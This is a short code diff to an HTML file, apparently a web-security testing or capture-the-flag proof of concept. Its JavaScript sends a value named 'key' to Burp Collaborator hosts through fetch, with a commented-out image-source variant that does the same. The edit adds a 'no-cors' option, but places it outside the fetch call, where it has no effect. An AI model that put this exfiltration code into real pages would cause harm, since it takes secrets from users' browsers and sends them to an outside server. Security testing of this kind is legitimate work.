--- a/csl2.html
+++ b/csl2.html
@@ -17,7 +17,9 @@
     //    li.src = "http://s81a9uym9ibodhw899ouoeei89e02p.burpcollaborator.net?key="+k
     //    ul.appendChild(li);
         try {
-            fetch("http://qqkxpek9c8g1z17v3kas595rqiw8kx.burpcollaborator.net?key="+k)
+            fetch("http://qqkxpek9c8g1z17v3kas595rqiw8kx.burpcollaborator.net?key="+k),{
+                mode: 'no-cors'
+            }
         } catch(e) {
             console.log("AA"+e);
         }
